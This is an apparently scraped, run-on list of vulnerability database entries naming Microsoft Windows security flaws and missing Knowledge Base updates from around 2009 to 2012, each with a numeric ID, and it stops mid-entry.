Microsoft Windows Phone messages denial of service [71873] Microsoft Windows win32k.sys code execution [71733] Microsoft Windows sandbox privilege escalation [71565] Microsoft Windows Knowledge Base Article 2648048 update is not installed [71564] Microsoft Windows Media Player DVR-MS code execution [71562] Microsoft Windows Knowledge Base Article 2640241 update is not installed [71560] Microsoft Windows Knowledge Base Article 2640045 update is not installed [71559] Microsoft Windows Active Directory buffer overflow [71558] Microsoft Windows Knowledge Base Article 2639417 update is not installed [71557] Microsoft Windows Knowledge Base Article 2639142 update is not installed [71554] Microsoft Windows Knowledge Base Article 2633171 update is not installed [71553] Microsoft Windows kernel privilege escalation [71552] Microsoft Windows Knowledge Base Article 2624667 update is not installed [71551] Microsoft Windows OLE object code execution [71550] Microsoft Windows Knowledge Base Article 2620712 update is not installed [71549] Microsoft Windows Client/Server Run-time Subsystem Csrsrv.dll privilege escalation [71548] Microsoft Windows Knowledge Base Article 2618451 update is not installed [71546] Microsoft Windows Knowledge Base Article 2618444 update is not installed [71542] Microsoft Windows Knowledge Base Article 2607702 update is not installed [71538] Microsoft Windows Knowledge Base Article 2590602 update is not installed [71418] Microsoft Windows keyboard layout denial of service [71291] Microsoft Windows Server AppLocker security bypass [71073] Microsoft Windows kernel Duqu code execution [70951] Microsoft Windows Knowledge Base Article 2630837 update is not installed [70950] Microsoft Windows Active Directory privilege escalation [70949] Microsoft Windows Knowledge Base Article 2620704 update is not installed [70948] Microsoft Windows Mail and Windows Meeting Space code execution [70947] Microsoft Windows Knowledge Base Article 2617657 update is not installed [70946] Microsoft Windows TrueType denial of service [70945] Microsoft Windows Knowledge Base Article 2603381 update is not installed [70944] Microsoft Windows Object Packager code execution [70943] Microsoft Windows Knowledge Base Article 2588516 update is not installed [70942] Microsoft Windows TCP/IP code execution [70940] Microsoft Windows ClickOnce code execution [70152] Microsoft Windows Knowledge Base Article 2623699 update is not installed [70150] Microsoft Windows Knowledge Base Article 2607670 update is not installed [70143] Microsoft Windows Media Center DLL code execution [70140] Microsoft Windows Knowledge Base Article 2652016 update is not installed [70137] Microsoft Windows Ancillary Function Driver privilege escalation [70130] Microsoft Windows Knowledge Base Article 2586448 update is not installed [70115] Microsoft Windows Knowledge Base Article 2567053 update is not installed [70114] Microsoft Windows use-after-free privilege escalation [70113] Microsoft Windows .fon buffer overflow [70112] Microsoft Windows TrueType denial of service [69638] Microsoft Windows csrss.exe denial of service [69558] Microsoft Windows Script Host DLL code execution [69501] Microsoft Windows Knowledge Base Article 2587634 update is not installed [69498] Microsoft Windows Knowledge Base Article 2587505 update is not installed [69492] Microsoft Windows Knowledge Base Article 2571621 update is not installed [69491] Microsoft Windows WINS privilege escalation [69490] Microsoft Windows Knowledge Base Article 2570947 update is not installed [69489] Microsoft Windows components DLL code execution [69215] Microsoft Windows DHCPv6 denial of service [69009] Microsoft Windows Client/Server Run-time Subsystem information disclosure [68840] Microsoft Windows Knowledge Base Article 2451858 update is not installed [68838] Microsoft SharePoint and Windows SharePoint Services cross-site scripting [68837] Microsoft SharePoint and Windows SharePoint Services XML file disclosure [68836] Microsoft SharePoint and Windows SharePoint Services contact details cross-site scripting [68833] Microsoft Windows Knowledge Base Article 2567943 update is not installed [68831] Microsoft Windows Knowledge Base Article 2570222 update is not installed [68830] Microsoft Windows Remote Desktop Protocol denial of service [68829] Microsoft Windows Knowledge Base Article 2567951 update is not installed [68827] Microsoft Windows Knowledge Base Article 2578230 update is not installed [68825] Microsoft Windows Knowledge Base Article 2546250 update is not installed [68824] Microsoft Windows Remote Desktop Web Access privilege escalation [68823] Microsoft Windows Knowledge Base Article 2559049 update is not installed [68816] Microsoft Windows Knowledge Base Article 2556532 update is not installed [68815] Microsoft Windows kernel meta-data denial of service [68814] Microsoft Windows Knowledge Base Article 2560656 update is not installed [68813] Microsoft Windows Data Access code execution [68812] Microsoft Windows Knowledge Base Article 2560978 update is not installed [68809] Microsoft Windows Knowledge Base Article 2562485 update is not installed [68808] Microsoft Windows DNS Server denial of service [68807] Microsoft Windows DNS Server code execution [68806] Microsoft Windows Knowledge Base Article 2566454 update is not installed [68805] Microsoft Windows NDISTAPI privilege escalation [68804] Microsoft Windows Knowledge Base Article 2563894 update is not installed [68803] Microsoft Windows TCP/IP QoS denial of service [68802] Microsoft Windows TCP/IP ICMP denial of service [68801] Microsoft Windows Knowledge Base Article 2567680 update is not installed [68800] Microsoft Windows Client/Server Run-time Subsystem Winsrv.dl privilege escalation [68469] Microsoft Windows GPU denial of service [68467] Microsoft Windows NVIDIA Geforce 310 denial of service [68465] Microsoft Windows Intel G41 denial of service [68315] Microsoft Windows Knowledge Base Article 2555917 update is not installed [68314] Microsoft Windows win32k.sys privilege escalation [68313] Microsoft Windows win32k.sys privilege escalation [68312] Microsoft Windows win32k.sys information disclosure [68311] Microsoft Windows NULL privilege escalation [68310] Microsoft Windows win32k.sys privilege escalation [68309] Microsoft Windows win32k.sys privilege escalation [68308] Microsoft Windows win32k.sys privilege escalation [68307] Microsoft Windows NULL pointer privilege escalation [68306] Microsoft Windows NULL pointer privilege escalation [68305] Microsoft Windows kernel-mode driver privilege escalation [68304] Microsoft Windows kernel-mode driver privilege escalation [68303] Microsoft Windows kernel-mode driver privilege escalation [68302] Microsoft Windows win32k.sys privilege escalation [68301] Microsoft Windows win32k.sys privilege escalation [68300] Microsoft Windows win32k.sys privilege escalation [68299] Microsoft Windows Knowledge Base Article 2566220 update is not installed [68298] Microsoft Windows Bluetooth stack code execution [68283] Microsoft Windows Knowledge Base Article 2560847 update is not installed [68002] Microsoft Windows Media Player klite denial of service [67989] Microsoft Windows tskill privilege escalation [67955] Microsoft Windows Knowledge Base Article 2530548 update is not installed [67943] Microsoft Windows Knowledge Base Article 2544521 update is not installed [67942] Microsoft Windows Vector Markup Language (VML) code execution [67795] Microsoft Windows Live Messenger dwmapi.dll code execution [67762] Microsoft Windows Knowledge Base Article 2543893 update is not installed [67759] Microsoft Windows Knowledge Base Article 2544893 update is not installed [67758] Microsoft Windows MHTML information disclosure [67757] Microsoft Windows Knowledge Base Article 2476490 update is not installed [67756] Microsoft Windows Object Linking and Embedding WMF code execution [67755] Microsoft Windows Knowledge Base Article 2503665 update is not installed [67754] Microsoft Windows Ancillary Function Driver privilege escalation [67753] Microsoft Windows Knowledge Base Article 2514842 update is not installed [67751] Microsoft Windows Knowledge Base Article 2518295 update is not installed [67750] Microsoft Windows Active Directory Certificate Services Web Enrollment cross-site scripting [67749] Microsoft Windows Knowledge Base Article 2507938 update is not installed [67748] Microsoft Windows SrvWriteConsoleOutputString privilege escalation [67747] Microsoft Windows SrvWriteConsoleOutput privilege escalation [67746] Microsoft Windows CSRSS SrvSetConsoleNumberOfCommand privilege escalation [67745] Microsoft Windows CSRSS SrvSetConsoleLocalEUDC privilege escalation [67744] Microsoft Windows CSRSS AllocConsole privilege escalation [67737] Microsoft Windows Knowledge Base Article 2520426 update is not installed [67733] Microsoft Windows Knowledge Base Article 2525694 update is not installed [67732] Microsoft Windows Win32k OTF code execution [67731] Microsoft Windows Knowledge Base Article 2525835 update is not installed [67730] Microsoft Windows Server Hyper-V VMBus denial of service [67728] Microsoft Windows Knowledge Base Article 2535512 update is not installed [67727] Microsoft Windows DFS denial of service [67726] Microsoft Windows DFS code execution [67725] Microsoft Windows Knowledge Base Article 2536275 update is not installed [67724] Microsoft Windows SMB request denial of service [67722] Microsoft Windows Knowledge Base Article 2536276 update is not installed [67721] Microsoft Windows SMB responses code execution [67718] Microsoft Windows Knowledge Base Article 2537146 update is not installed [67709] Microsoft Windows Knowledge Base Article 2538814 update is not installed [67520] Microsoft Windows Vista nsiproxy.sys denial of service [67302] Microsoft Windows Knowledge Base Article 2545814 update is not installed [67101] Microsoft Windows Knowledge Base Article 2524426 update is not installed [67100] Microsoft Windows Windows Internet Name Service code execution [66856] Microsoft Windows Media Player .avi buffer overflow [66855] Microsoft Windows Media Player .ogg denial of service [66845] Microsoft Windows Knowledge Base Article 2506014 update is not installed [66844] Microsoft Windows Knowledge Base Article 2501584 update is not installed [66835] Microsoft Windows and Internet Explorer msxml.dll information disclosure [66639] Microsoft Windows XP afd.sys denial of service [66469] Microsoft Windows Explorer Shmedia.dll denial of service [66448] Microsoft Windows Knowledge Base Article 2508272 update is not installed [66447] Microsoft Windows Messenger ActiveX control code execution [66446] Microsoft Windows Knowledge Base Article 2514666 update is not installed [66445] Microsoft Windows VBScript and Jscript code execution [66444] Microsoft Windows Knowledge Base Article 2511455 update is not installed [66443] Microsoft Windows SMB response code execution [66442] Microsoft Windows Knowledge Base Article 2509553 update is not installed [66441] Microsoft Windows DNS resolution code execution [66440] Microsoft Windows Knowledge Base Article 2508429 update is not installed [66439] Microsoft Windows SMB protocol code execution [66438] Microsoft Windows Knowledge Base Article 2507618 update is not installed [66437] Microsoft Windows OpenType buffer overflow [66436] Microsoft Windows Knowledge Base Article 2497640 update is not installed [66432] Microsoft Windows Knowledge Base Article 2527308 update is not installed [66431] Microsoft Windows Fax Cover Page Editor code execution [66430] Microsoft Windows Knowledge Base Article 2503658 update is not installed [66428] Microsoft Windows Knowledge Base Article 2489979 update is not installed [66427] Microsoft Windows GDI+ EMF code execution [66425] Microsoft Windows Knowledge Base Article 2506223 update is not installed [66424] Microsoft Windows kernel-mode driver (win32k.sys) variant 30 privilege escalation [66423] Microsoft Windows kernel-mode driver (win32k.sys) variant 29 privilege escalation [66422] Microsoft Windows kernel-mode driver (win32k.sys) variant 28 privilege escalation [66421] Microsoft Windows kernel-mode driver (win32k.sys) variant 27 privilege escalation [66420] Microsoft Windows kernel-mode driver (win32k.sys) variant 26 privilege escalation [66419] Microsoft Windows kernel-mode driver (win32k.sys) variant 25 privilege escalation [66418] Microsoft Windows kernel-mode driver (win32k.sys) variant 24 privilege escalation [66417] Microsoft Windows kernel-mode driver (win32k.sys) variant 23 privilege escalation [66416] Microsoft Windows kernel-mode driver (win32k.sys) variant 22 privilege escalation [66415] Microsoft Windows kernel-mode driver (win32k.sys) variant 21 privilege escalation [66414] Microsoft Windows kernel-mode driver (win32k.sys) variant 20 privilege escalation [66413] Microsoft Windows kernel-mode driver (win32k.sys) variant 19 privilege escalation [66412] Microsoft Windows kernel-mode driver (win32k.sys) variant 18 privilege escalation [66411] Microsoft Windows kernel-mode driver (win32k.sys) variant 17 privilege escalation [66410] Microsoft Windows kernel-mode driver (win32k.sys) variant 16 privilege escalation [66409] Microsoft Windows kernel-mode driver (win32k.sys) variant 15 privilege escalation [66408] Microsoft Windows kernel-mode driver (win32k.sys) variant 14 privilege escalation [66407] Microsoft Windows kernel-mode driver (win32k.sys) variant 13 privilege escalation [66406] Microsoft Windows kernel-mode driver (win32k.sys) variant 12 privilege escalation [66405] Microsoft Windows kernel-mode driver (win32k.sys) variant 11 privilege escalation [66404] Microsoft Windows kernel-mode driver (win32k.sys) variant 10 privilege escalation [66403] Microsoft Windows kernel-mode driver (win32k.sys) variant 9 privilege escalation [66402] Microsoft Windows kernel-mode driver (win32k.sys) variant 8 privilege escalation [66401] Microsoft Windows kernel-mode driver (win32k.sys) variant 7 privilege escalation [66400] Microsoft Windows kernel-mode driver (win32k.sys) variant 6 privilege escalation [66399] Microsoft Windows kernel-mode driver (win32k.sys) variant 5 privilege escalation [66398] Microsoft Windows kernel-mode driver (win32k.sys) variant 4 privilege escalation [66397] Microsoft Windows kernel-mode driver (win32k.sys) variant 3 privilege escalation [66396] Microsoft Windows kernel-mode driver (win32k.sys) variant 2 privilege escalation [66395] Microsoft Windows kernel-mode driver (win32k.sys) variant 1 privilege escalation [66394] Microsoft Windows Knowledge Base Article 2485663 update is not installed [66312] Microsoft Windows Media Player .ape buffer overflow [66254] Microsoft Windows certificates spoofing [65972] Microsoft Windows mscorsvw.exe privilege escalation [65588] Microsoft Windows Knowledge Base Article 2489279 update is not installed [65581] Microsoft Windows Knowledge Base Article 2510030 update is not installed [65580] Microsoft Windows Knowledge Base Article 2489283 update is not installed [65575] Microsoft Windows Knowledge Base Article 2489293 update is not installed [65573] Microsoft Windows Knowledge Base Article 2494047 update is not installed [65570] Microsoft Windows Knowledge Base Article 2500212 update is not installed [65568] Microsoft Windows Knowledge Base Article 2508062 update is not installed [65567] Microsoft Windows RDC code execution [65495] Microsoft Windows HID weak security [65383] Microsoft Windows Graphics Rendering Engine height integer overflow [65382] Microsoft Windows Graphics Rendering Engine BMP integer overflow [65381] Microsoft Windows Graphics Rendering Engine biCompression buffer overflow [65376] Microsoft Windows Server CIFS code execution [65169] Microsoft Windows Azure information disclosure [65000] Microsoft Windows MHTML information disclosure [64973] Microsoft Windows Knowledge Base Article 2478960 update is not installed [64972] Microsoft Windows LSASS privilege escalation [64971] Microsoft Windows Knowledge Base Article 2479628 update is not installed [64970] Microsoft Windows Win32k.sys privilege escalation [64969] Microsoft Windows classpointer privilege escalation [64968] Microsoft Windows pointer privilege escalation [64967] Microsoft Windows Win32k.sys privilege escalation [64966] Microsoft Windows Win32k.sys privilege escalation [64927] Microsoft Windows Knowledge Base Article 2393802 update is not installed [64926] Microsoft Windows kernel privilege escalation [64925] Microsoft Windows Knowledge Base Article 2451879 update is not installed [64921] Microsoft Windows Media Player and Windows Media Center DVR-MS code execution [64920] Microsoft Windows Knowledge Base Article 2475792 update is not installed [64919] Microsoft Windows VBScript and JScript information disclosure [64918] Microsoft Windows Knowledge Base Article 2476687 update is not installed [64917] Microsoft Windows CSRSS privilege escalation [64916] Microsoft Windows Knowledge Base Article 2478953 update is not installed [64915] Microsoft Windows Active Directory denial of service [64914] Microsoft Windows Knowledge Base Article 2482017 update is not installed [64910] Microsoft Windows Knowledge Base Article 2483185 update is not installed [64909] Microsoft Windows Knowledge Base Article 2484015 update is not installed [64907] Microsoft Windows Knowledge Base Article 2485376 update is not installed [64906] Microsoft Windows OpenType Compact Font Format code execution [64905] Microsoft Windows Knowledge Base Article 2489256 update is not installed [64902] Microsoft Windows Knowledge Base Article 2496930 update is not installed [64837] Microsoft Windows Fax Cover Page Editor code execution [64583] Microsoft Windows Neighbor Discovery (ND) protocol denial of service [64474] Microsoft Windows Remote Access Phonebook code execution [64446] Microsoft Windows Contacts DLL code execution [64382] Microsoft Windows Graphics Rendering Engine buffer overflow [64342] Microsoft Windows Knowledge Base Article 2451910 update is not installed [64339] Microsoft Windows Knowledge Base Article 2478935 update is not installed [64307] Microsoft Windows Windows Fax Cover Page Editor component buffer overflow [63909] Microsoft Windows dynamic-linked library (oci.dll) code execution [63816] Microsoft Windows Media Encoder 9 dynamic-linked library (DLL) code execution [63807] Microsoft Windows Mail dynamic-linked library (wab32res.dll) code execution [63803] Microsoft Windows Live Messenger dynamic-linked library (msgsres.dll) code execution [63788] Microsoft Windows Backup dynamic-linked library (fveapi.dll) code execution [63787] Microsoft Windows Internet Communication Settings dynamic-linked library (schannel.dll) code execution [63779] Microsoft Windows Indeo Filter dynamic-linked library (iacenc.dll) code execution [63776] Microsoft Windows Program Group Converter dynamic-linked library (DLL) code execution [63773] Microsoft Windows Address Book dynamic-linked library (wab32res.dll) code execution [63586] Microsoft Windows Knowledge Base Article 2207559 update is not installed [63585] Microsoft Windows Netlogon denial of service [63584] Microsoft Windows Knowledge Base Article 2424434 update is not installed [63583] Microsoft Windows Movie Maker insecure library loading code execution [63582] Microsoft Windows Knowledge Base Article 2423089 update is not installed [63580] Microsoft Windows Knowledge Base Article 2436673 update is not installed [63579] Microsoft Windows user mode privilege escalation [63578] Microsoft Windows cursor privilege escalation [63577] Microsoft Windows WriteAV privilege escalation [63576] Microsoft Windows pointer privilege escalation [63575] Microsoft Windows double free privilege escalation [63574] Microsoft Windows kernel-mode drivers buffer overflow [63573] Microsoft Windows Knowledge Base Article 2407132 update is not installed [63571] Microsoft Windows Knowledge Base Article 2440591 update is not installed [63570] Microsoft Windows NDProxy buffer overflow [63569] Microsoft Windows Knowledge Base Article 2385678 update is not installed [63568] Microsoft Windows BranchCache code execution [63566] Microsoft Windows Knowledge Base Article 2442962 update is not installed [63565] Microsoft Windows Consent User Interface privilege escalation [63564] Microsoft Windows Knowledge Base Article 2345316 update is not installed [63563] Microsoft Windows Server Hyper-V VMBus denial of service [63562] Microsoft Windows Knowledge Base Article 2296199 update is not installed [63561] Microsoft Windows OpenType Font (OTF) CMAP code execution [63560] Microsoft Windows OpenType Font (OTF) format driver code execution [63559] Microsoft Windows OpenType Font (OTF) format driver code execution [63558] Microsoft Windows Knowledge Base Article 2416400 update is not installed [63550] Microsoft Windows Knowledge Base Article 2447961 update is not installed [63549] Microsoft Windows Media Encoder code execution [63548] Microsoft Windows Knowledge Base Article 2443105 update is not installed [63547] Microsoft Windows Internet Signup code execution [63546] Microsoft Windows Knowledge Base Article 2455005 update is not installed [63544] Microsoft Windows Knowledge Base Article 2292970 update is not installed [63538] Microsoft Windows Knowledge Base Article 968095 update is not installed [63450] Microsoft Windows REG_BINARY privilege escalation [62805] Microsoft Windows Knowledge Base Article 2316074 update is not installed [62797] Microsoft Windows Knowledge Base Article 2305420 update is not installed [62796] Microsoft Windows Task Scheduler privilege escalation [62793] Microsoft Windows Knowledge Base Article 2293386 update is not installed [62789] Microsoft Windows Knowledge Base Article 2423930 update is not installed [62737] Microsoft WindowsTask Scheduler service privilege escalation [62716] Microsoft Windows Mobile .vcf denial of service [62643] Microsoft Windows unspecified privilege escalation [62642] Microsoft Windows unspecified privilege escalation [62170] Microsoft Windows Knowledge Base Article 2296011 update is not installed [62169] Microsoft Windows Explorer buffer overflow [62166] Microsoft Windows Knowledge Base Article 2294255 update is not installed [62165] Microsoft Windows Failover Cluster Manager insecure permissions [62163] Microsoft Windows Knowledge Base Article 2281679 update is not installed [62162] Microsoft Windows Media Player RTSP code execution [62154] Microsoft Windows Knowledge Base Article 2279986 update is not installed [62153] Microsoft Windows OpenType Font fonts privilege escalation [62152] Microsoft Windows OpenType Font privilege escalation [62149] Microsoft Windows Knowledge Base Article 2207566 update is not installed [62148] Microsoft Windows SChannel denial of service [62147] Microsoft Windows Knowledge Base Article 2160841 update is not installed [62143] Microsoft Windows Knowledge Base Article 982132 update is not installed [62142] Microsoft Windows OpenType table code execution [62138] Microsoft Windows Knowledge Base Article 981957 update is not installed [62137] Microsoft Windows class privilege escalation [62135] Microsoft Windows keyboard privilege escalation [62134] Microsoft Windows Knowledge Base Article 2412048 update is not installed [62133] Microsoft Windows Knowledge Base Article 2405882 update is not installed [62129] Microsoft Windows Knowledge Base Article 2387149 update is not installed [62126] Microsoft Windows Knowledge Base Article 2378111 update is not installed [62125] Microsoft Windows Media Player code execution [62123] Microsoft Windows Knowledge Base Article 2360937 update is not installed [62118] Microsoft Windows Knowledge Base Article 2293211 update is not installed [62104] Microsoft Windows Knowledge Base Article 2360131 update is not installed [62103] Microsoft Windows LPC message privilege escalation [62098] Microsoft Windows Knowledge Base Article 2293194 update is not installed [62069] Microsoft Windows Knowledge Base Article 2418042 update is not installed [62006] Microsoft Windows unspecified privilege escalation [61994] Microsoft Windows MPEG Layer-3 Audio Decoder denial of service [61519] Microsoft Windows Knowledge Base Article 2121546 update is not installed [61518] Microsoft Windows CSRSS privilege escalation [61517] Microsoft Windows Knowledge Base Article 2259922 update is not installed [61514] Microsoft Windows Knowledge Base Article 2267960 update is not installed [61510] Microsoft Windows Knowledge Base Article 2315011 update is not installed [61507] Microsoft Windows Knowledge Base Article 2320113 update is not installed [61506] Microsoft Windows Unicode Scripts Processor code execution [61504] Microsoft Windows Knowledge Base Article 2347290 update is not installed [61503] Microsoft Windows Print Spooler service code execution [61501] Microsoft Windows Knowledge Base Article 975558 update is not installed [61500] Microsoft Windows MPEG-4 code execution [61499] Microsoft Windows Knowledge Base Article 982802 update is not installed [61498] Microsoft Windows RPC code execution [61258] Microsoft Windows IcmpSendEcho2Ex denial of service [61187] Microsoft Windows xxxRealDrawMenuItem() privilege escalation [61184] Microsoft Windows win32k!GreStretchBltInternal() denial of service [60975] Microsoft Windows CreateDIBPalette() buffer overflow [60736] Microsoft Windows Knowledge Base Article 2265906 update is not installed [60734] Microsoft Windows Knowledge Base Article 2269638 update is not installed [60728] Microsoft Windows Knowledge Base Article 2269707 update is not installed [60724] Microsoft Windows Knowledge Base Article 2286198 update is not installed [60723] Microsoft Windows Knowledge Base Article 978886 update is not installed [60722] Microsoft Windows TCP/IP input buffer privilege escalation [60721] Microsoft WindowsTCP/IP IPv6 denial of service [60719] Microsoft Windows Knowledge Base Article 980436 update is not installed [60718] Microsoft Windows SChannel code execution [60713] Microsoft Windows Knowledge Base Article 2183461 update is not installed [60705] Microsoft Windows Knowledge Base Article 981852 update is not installed [60704] Microsoft Windows kernel ACL denial of service [60703] Microsoft Windows kernel errors privilege escalation [60702] Microsoft Windows kernel threads privilege escalation [60701] Microsoft Windows Knowledge Base Article 981997 update is not installed [60700] Microsoft Windows Movie Maker code execution [60698] Microsoft Windows Knowledge Base Article 2160329 update is not installed [60697] Microsoft Windows kernel-mode drivers window privilege escalation [60696] Microsoft Windows kernel-mode drivers input privilege escalation [60695] Microsoft Windows kernel-mode drivers memory privilege escalation [60694] Microsoft Windows kernel-mode drivers exception privilege escalation [60693] Microsoft Windows kernel-mode drivers denial of service [60692] Microsoft Windows Knowledge Base Article 982214 update is not installed [60691] Microsoft Windows SMB stack denial of service [60690] Microsoft Windows SMB variable denial of service [60689] Microsoft Windows SMB pool code execution [60688] Microsoft Windows Knowledge Base Article 982665 update is not installed [60687] Microsoft Windows Cinepak Codec code execution [60686] Microsoft Windows Knowledge Base Article 2115168 update is not installed [60685] Microsoft Windows MPEG Layer-3 Codecs code execution [60684] Microsoft Windows Knowledge Base Article 2079403 update is not installed [60683] Microsoft Windows XML Core Services (MSXML) code execution [60682] Microsoft Windows Knowledge Base Article 982799 update is not installed [60681] Microsoft Windows Tracing Feature privilege escalation [60680] Microsoft Windows Knowledge Base Article 2264072 update is not installed [60679] Microsoft Windows registry key ACL privilege escalation [60678] Microsoft Windows Service Isolation privilege escalation [60677] Microsoft Windows Knowledge Base Article 983539 update is not installed [60676] Microsoft Windows LSASS privilege escalation [60422] Microsoft Windows .lnk file code execution [60120] Microsoft Windows NtUserCheckAccessForIntegrityLevel() privilege escalation [60095] Microsoft Windows UpdateFrameTitleForDocument() buffer overflow [59901] Microsoft Windows Knowledge Base Article 2229593 update is not installed [59898] Microsoft Windows Knowledge Base Article 2229593 update is not installed [59895] Microsoft Windows Knowledge Base Article 978212 update is not installed [59891] Microsoft Windows Knowledge Base Article 982335 update is not installed [59447] Microsoft Windows Help and Support Center GetServerName cross-site scripting [59267] Microsoft Windows helpctr.exe command execution [58944] Microsoft Windows Knowledge Base Article 979902 update not installed [58943] Microsoft Windows MJPEG code execution [58942] Microsoft Windows media files code execution [58913] Microsoft Windows Knowledge Base Article 2027452 update is not installed [58891] Microsoft Windows Knowledge Base Article 2028554 update is not installed [58887] Microsoft Windows kernel-mode drivers TrueType privilege escalation [58885] Microsoft Windows Knowledge Base Article 980218 update is not installed [58884] Microsoft Windows OpenType Compact Font Format privilege escalation [58883] Microsoft Windows Knowledge Base Article 981343 update is not installed [58871] Microsoft Windows Knowledge Base Article 982381 update is not installed [58865] Microsoft Windows Knowledge Base Article 982666 update is not installed [58863] Microsoft Windows Knowledge Base Article 983235 update is not installed [58622] Microsoft Windows Canonical Display Driver (cdd.dll) code execution [58345] Microsoft Windows SMTP Service query id spoofing [58344] Microsoft Windows SMTP Service DNS spoofing [58243] Microsoft Office SharePoint Server and Microsoft Windows SharePoint Services help.aspx cross-site scripting [58173] Microsoft Windows Knowledge Base Article 978542 update is not installed [58172] Microsoft Outlook Express and Windows Mail client integer overflow [58171] Microsoft Windows Knowledge Base Article 978213 update is not installed [58060] Microsoft Windows SfnINSTRING() privilege escalation [58059] Microsoft Windows SfnLOGONNOTIFY() denial of service [57601] Microsoft Windows kernel exceptions denial of service [57600] Microsoft Windows kernel image file denial of service [57599] Microsoft Windows kernel path denial of service [57597] Microsoft Windows kernel registry keys denial of service [57596] Microsoft Windows kernel symbolic links denial of service [57595] Microsoft Windows kernel registry keys denial of service [57580] Microsoft Windows Knowledge Base Article 981210 update is not installed [57579] Microsoft Windows Cabinet File Viewer (cabview.dll) code execution [57578] Microsoft Windows WinVerifyTrust signature validation code execution [57380] Microsoft Windows Knowledge Base Article 979683 update is not installed [57379] Microsoft Windows kernel symbolic link privilege escalation [57378] Microsoft Windows kernel memory privilege escalation [57377] Microsoft Windows Knowledge Base Article 979559 update is not installed [57376] Microsoft Windows kernel-mode drivers windows privilege escalation [57375] Microsoft Windows kernel-mode drivers objects privilege escalation [57374] Microsoft Windows Knowledge Base Article 977816 update is not installed [57372] Microsoft Windows Knowledge Base Article 978338 update is not installed [57370] Microsoft Windows ISATAP IPv6 spoofing [57343] Microsoft Windows Knowledge Base Article 979402 update is not installed [57342] Microsoft Windows Media Player ActiveX control code execution [57341] Microsoft Windows Knowledge Base Article 980094 update is not installed [57337] Microsoft Windows Knowledge Base Article 980195 update is not installed [57336] Microsoft Windows Knowledge Base Article 980232 update is not installed [57335] Microsoft Windows SMB message code execution [57334] Microsoft Windows SMB transaction responses code execution [57333] Microsoft Windows SMB code execution [57332] Microsoft Windows SMB memory privilege escalation [57330] Microsoft Windows Knowledge Base Article 980858 update is not installed [57329] Microsoft Windows Media Services info packets buffer overflow [57328] Microsoft Windows Knowledge Base Article 981160 update is not installed [57326] Microsoft Windows Knowledge Base Article 981169 update is not installed [57325] Microsoft Windows Knowledge Base Article 981832 update is not installed [57324] Microsoft Windows SMTP Service Simple Mail Transfer Protocol memory information disclosure [57323] Microsoft Windows SMTP Service and Microsoft Exchange SMTP DNS Mail Exchanger (MX) denial of service [57322] Microsoft Windows Knowledge Base Article 980182 update is not installed [57205] Microsoft Windows Media Player .AVI code execution [56853] Microsoft Windows MS HTML Help ActiveX control (hhctrl.ocx) HtmlHelpA() code execution [56756] Microsoft Windows .ani file denial of service [56591] Microsoft Windows API denial of service [56560] Microsoft Windows winhlp32.exe buffer overflow [56558] Microsoft Windows MsgBox() code execution [56470] Microsoft Windows Knowledge Base Article 980150 update is not installed [56461] Microsoft Windows Knowledge Base Article 975561 update is not installed [56435] Microsoft Windows Media Player .mpg denial of service [56218] Microsoft Windows DNS weak security [55935] Microsoft Windows Knowledge Base Article 975713 update is not installed [55934] Microsoft Windows Knowledge Base Article 978037 update is not installed [55933] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) privilege escalation [55932] Microsoft Windows Knowledge Base Article 978214 update is not installed [55930] Microsoft Windows Knowledge Base Article 977935 update is not installed [55928] Microsoft Windows Knowledge Base Article 978706 update is not installed [55926] Microsoft Windows Knowledge Base Article 977894 update is not installed [55925] Microsoft Windows Hyper-V instruction set denial of service [55924] Microsoft Windows Knowledge Base Article 977377 update is not installed [55923] Microsoft Windows Knowledge Base Article 977290 update is not installed [55921] Microsoft Windows Knowledge Base Article 977165 update is not installed [55920] Microsoft Windows kernel privilege escalation [55917] Microsoft Windows Knowledge Base Article 978262 update is not installed [55910] Microsoft Windows Knowledge Base Article 971468 update is not installed [55909] Microsoft Windows SMB NTLM privilege escalation [55908] Microsoft Windows SMB NULL denial of service [55907] Microsoft Windows SMB denial of service [55906] Microsoft Windows SMB pathname code execution [55898] Microsoft Windows Knowledge Base Article 974145 update is not installed [55897] Microsoft Windows TCP/IP SACK denial of service [55896] Microsoft Windows TCP/IP Route Information code execution [55895] Microsoft Windows TCP/IP stack datagram code execution [55894] Microsoft Windows TCP/IP ICMPv6 code execution [55890] Microsoft Windows Knowledge Base Article 975416 update is not installed [55779] Microsoft Windows Knowledge Base Article 978207 update is not installed [55742] Microsoft Windows #GP trap handler privilege escalation [55680] Microsoft Windows Media Player ActiveX control code execution [55560] Microsoft Windows XP Flash Player code execution [55153] Microsoft Windows Knowledge Base Article 978251 update is not installed [55152] Microsoft Windows Server Message Block client code execution [55151] Microsoft Windows Server Message Block pool code execution [55150] Microsoft Windows Knowledge Base Article 972270 update is not installed [55149] Microsoft Windows EOT font buffer overflow [54645] Microsoft Internet Explorer and Windows Media player Intel Indeo codec code execution [54644] Microsoft Internet Explorer and Windows Media player Intel Indeo codec code execution [54643] Microsoft Internet Explorer and Windows Media player Intel Indeo41 codec buffer overflow [54642] Microsoft Internet Explorer and Windows Media player Intel Indeo41 codec buffer overflow [54445] Microsoft Windows Knowledge Base Article 975539 update is not installed [54443] Microsoft Windows Knowledge Base Article 974392 update is not installed [54442] Microsoft Windows Local Security Authority Subsystem Service (LSASS) denial of service [54440] Microsoft Windows Knowledge Base Article 974318 update is not installed [54439] Microsoft Windows Internet Authentication Service (IAS) privilege escalation [54438] Microsoft Windows Internet Authentication Service (IAS) code execution [54427] Microsoft Windows Knowledge Base Article 971726 update is not installed [54426] Microsoft Windows Active Directory Federation Services (ADFS) code execution [54425] Microsoft Windows Active Directory Federation Services (ADFS) spoofing [54424] Microsoft Windows Knowledge Base Article 967183 update is not installed [54422] Microsoft Windows Knowledge Base Article 976325 update is not installed [54217] Microsoft Windows KeAccumulateTicks() denial of service [54012] Microsoft Windows Knowledge Base Article 972652 update is not installed [53991] Microsoft Windows Knowledge Base Article 973309 update is not installed [53990] Microsoft Windows ADAM LDAP denial of service [53986] Microsoft Windows Knowledge Base Article 973565 update is not installed [53985] Microsoft Windows WSDAPI code execution [53981] Microsoft Windows Knowledge Base Article 974783 update is not installed [53980] Microsoft Windows 2000 License Logging Server buffer overflow [53977] Microsoft Windows Knowledge Base Article 976307 update is not installed [53975] Microsoft Windows Knowledge Base Article 969947 update is not installed [53974] Microsoft Windows kernel font code execution [53973] Microsoft Windows kernel GDI privilege escalation [53972] Microsoft Windows kernel NULL pointer privilege escalation [53551] Microsoft Windows Knowledge Base Article KB973525 update is not installed [53550] Microsoft Windows Knowledge Base 